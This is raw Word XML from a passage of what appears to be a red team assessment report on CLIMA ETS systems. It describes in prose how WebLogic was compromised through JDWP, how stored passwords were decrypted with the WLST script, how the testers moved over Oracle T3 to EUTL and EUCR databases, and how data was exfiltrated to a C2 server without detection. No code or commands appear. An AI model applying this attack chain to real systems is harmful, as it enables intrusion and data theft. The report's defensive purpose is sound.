      <w:r w:rsidRPr="001019D3">
        <w:t>“Compromise any CLIMA ETS assets not included in the “Out-of-scope” asset list by obtaining unauthorised access”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8C9E65" w14:textId="7CA54B00" w:rsidR="00A27475" w:rsidRPr="001019D3" w:rsidRDefault="00A27475" w:rsidP="00A27475">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Provide </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IoCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (screenshots) from any compromised in-scope asset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26934A7D" w14:textId="7D8481B0" w:rsidR="00161CD3" w:rsidRPr="001019D3" w:rsidRDefault="00161CD3" w:rsidP="00161CD3">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1582"/>
        </w:tabs>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="57" w:right="57"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">See </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213099151 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error! Reference source not found.</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00845DD2" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00845DD2" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00845DD2" w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref209791354 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00845DD2" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.2</w:t>
      </w:r>
      <w:r w:rsidR="00845DD2" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E268A9" w14:textId="3FE1E0D9" w:rsidR="001855DA" w:rsidRPr="001019D3" w:rsidRDefault="001855DA" w:rsidP="00161CD3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Step 3: Expand the reach using discovered credentials</w:t>
      </w:r>
      <w:r w:rsidR="00A27475" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">, services </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>and Oracle T3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FDDA55" w14:textId="1BC530F3" w:rsidR="00A27475" w:rsidRPr="001019D3" w:rsidRDefault="001855DA" w:rsidP="00FB3693">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>With WebLogic servers compromised using JDWP, it was possible to find and decrypt other passwords that allowed access to among others to T3, readily available on all Oracle servers both allowing encrypted and non-encrypted communication channels. This connection allowed to reach all other WebLogic and Oracle DB servers in the scope and allowed to gain access to the EUTL transaction table which contained a flag to capture (set by CLIMA) by decrypting the Oracle DB password using the readily available wlsth.sh script (shipped with all new WebLogic installations).</w:t>
      </w:r>
      <w:r w:rsidR="00FB3693" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> All while doing the tasks, it was noticed that no EDR solution prevented the malicious interactions including exfiltration of data to Red Team controlled C2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD290CD" w14:textId="6AE1205E" w:rsidR="00FB3693" w:rsidRPr="001019D3" w:rsidRDefault="00FB3693" w:rsidP="00FB3693">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Goal achieved: </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>“BHS – EUTL Public + database (ACC)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798C7CD2" w14:textId="157BD4D3" w:rsidR="00A27475" w:rsidRPr="001019D3" w:rsidRDefault="00161CD3" w:rsidP="00FB3693">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1890"/>
        </w:tabs>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:right="57"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Objective</w:t>
      </w:r>
      <w:r w:rsidR="00FB3693" w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> achieved</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4380B9" w14:textId="21AE3CB5" w:rsidR="00FB3693" w:rsidRPr="001019D3" w:rsidRDefault="00FB3693" w:rsidP="00A27475">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Establish C&amp;C communication channel from any in-scope servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36876FFD" w14:textId="0027B0F2" w:rsidR="00A27475" w:rsidRPr="001019D3" w:rsidRDefault="00A27475" w:rsidP="00A27475">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Provide </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IoCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (screenshots) from any compromised in-scope asset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEC056C" w14:textId="4A5482F0" w:rsidR="00845DD2" w:rsidRPr="001019D3" w:rsidRDefault="00845DD2" w:rsidP="00161CD3">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1890"/>
        </w:tabs>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="57" w:right="57"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">See </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213099208 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.3</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213099215 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.4</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213099244 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.5</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213099251 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error! Reference source not found.</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213093207 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.5</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A27475" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00A27475" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A27475" w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213092634 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00A27475" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.9</w:t>
      </w:r>
      <w:r w:rsidR="00A27475" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A27475" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00A27475" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A27475" w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213099581 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00A27475" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.10</w:t>
      </w:r>
      <w:r w:rsidR="00A27475" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00A27475" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00A27475" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A27475" w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213099584 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00A27475" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error! Reference source not found.</w:t>
      </w:r>
      <w:r w:rsidR="00A27475" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5479F8F4" w14:textId="148F4EED" w:rsidR="001855DA" w:rsidRPr="001019D3" w:rsidRDefault="001855DA" w:rsidP="00161CD3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Step 4: Expand the reach to SHS using </w:t>
      </w:r>
      <w:r w:rsidR="00161CD3" w:rsidRPr="001019D3">
        <w:t>a white card</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5730E09A" w14:textId="17141A09" w:rsidR="001855DA" w:rsidRPr="001019D3" w:rsidRDefault="001855DA" w:rsidP="00161CD3">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Initial access to SHS was not </w:t>
      </w:r>
      <w:r w:rsidR="00161CD3" w:rsidRPr="001019D3">
        <w:t>possible</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> from the normal internal network access. The Red Team requested for a White Card to be able to use existing vulnerability scanners on the secure network to simulate a breach and enumerate vulnerabilities on servers deployed in SHS</w:t>
      </w:r>
      <w:r w:rsidR="00161CD3" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> and continue to reach the goals and objectives.</w:t>
      </w:r>
      <w:r w:rsidR="00FB3693" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> From this access, the same JDWP vulnerability was found and exploited and wlst.sh scripts were used again to decrypt and connect to EUCR &amp; EUTL data warehouse that contains another flag to capture (set by CLIMA). The analysis of database content and connections revealed that some captured users have too permissive permissions on databases and that Oracle DB instances are not audited for malicious connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B514482" w14:textId="5434A5F1" w:rsidR="00FB3693" w:rsidRPr="001019D3" w:rsidRDefault="00FB3693" w:rsidP="00161CD3">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Goal achieved:</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SHS – EUCR + EUTL Datawarehouse – BI (ACC)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382F3CE1" w14:textId="77777777" w:rsidR="00FB3693" w:rsidRPr="001019D3" w:rsidRDefault="00FB3693" w:rsidP="00FB3693">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1890"/>
        </w:tabs>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:right="57"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Objectives achieved</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B0A009" w14:textId="77777777" w:rsidR="00FB3693" w:rsidRPr="001019D3" w:rsidRDefault="00FB3693" w:rsidP="00FB3693">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Provide </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>IoCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (screenshots) from any compromised in-scope asset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F15FE7" w14:textId="17D9DAAB" w:rsidR="00FB3693" w:rsidRPr="001019D3" w:rsidRDefault="00FB3693" w:rsidP="00161CD3">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">See </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213100273 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.7</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213100275 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.8</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7573ED33" w14:textId="77777777" w:rsidR="00FB3693" w:rsidRPr="001019D3" w:rsidRDefault="00FB3693">
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="663F3848" w14:textId="1A64F90C" w:rsidR="00901AD4" w:rsidRPr="001019D3" w:rsidRDefault="004356D9" w:rsidP="00901AD4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="142" w:name="_Toc212654669"/>
      <w:bookmarkStart w:id="143" w:name="_Ref208244309"/>
      <w:bookmarkStart w:id="144" w:name="_Toc212654659"/>
      <w:bookmarkStart w:id="145" w:name="_Toc138778725"/>
      <w:bookmarkStart w:id="146" w:name="_Toc156556671"/>
      <w:bookmarkStart w:id="147" w:name="_Toc213253564"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00901AD4" w:rsidRPr="001019D3">
        <w:t>xternal or outsider perspective</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="147"/>
    </w:p>
    <w:p w14:paraId="0F2F8680" w14:textId="7802469A" w:rsidR="00901AD4" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="00901AD4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="148" w:name="_Ref213097179"/>
      <w:bookmarkStart w:id="149" w:name="_Toc213253565"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Susceptibility to </w:t>
      </w:r>
      <w:r w:rsidR="00B86891" w:rsidRPr="001019D3">
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">hishing </w:t>
      </w:r>
      <w:r w:rsidR="00B86891" w:rsidRPr="001019D3">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>mails</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142"/>
      <w:bookmarkEnd w:id="148"/>
      <w:bookmarkEnd w:id="149"/>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416"/>
        <w:gridCol w:w="1914"/>
        <w:gridCol w:w="3106"/>
      </w:tblGrid>
      <w:tr w:rsidR="00901AD4" w:rsidRPr="001019D3" w14:paraId="737391CE" w14:textId="77777777" w:rsidTr="007455CA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D479E23" w14:textId="77777777" w:rsidR="00901AD4" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1382" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F8A830D" w14:textId="77777777" w:rsidR="00901AD4" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impacted assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2872" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FD2577F" w14:textId="77777777" w:rsidR="00901AD4" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ATT&amp;CK MITRE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00901AD4" w:rsidRPr="001019D3" w14:paraId="437B5F99" w14:textId="77777777" w:rsidTr="00B86891">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33AD709E" w14:textId="1B22ED19" w:rsidR="00901AD4" w:rsidRPr="001019D3" w:rsidRDefault="00B86891" w:rsidP="002F3DE9">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1382" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19A30822" w14:textId="77777777" w:rsidR="00901AD4" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="00C131C8">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Corporate laptops</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42B31AE0" w14:textId="77777777" w:rsidR="00B86891" w:rsidRPr="001019D3" w:rsidRDefault="00B86891" w:rsidP="00C131C8">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="100"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Internal Staff</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FC61CB7" w14:textId="5568F630" w:rsidR="00B86891" w:rsidRPr="001019D3" w:rsidRDefault="00B86891" w:rsidP="00C131C8">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:after="60" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>External Service Providers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1095" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0E485E9E" w14:textId="77777777" w:rsidR="00901AD4" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="007455CA">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="120" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA-0001</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0962877A" w14:textId="77777777" w:rsidR="00901AD4" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="007455CA">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
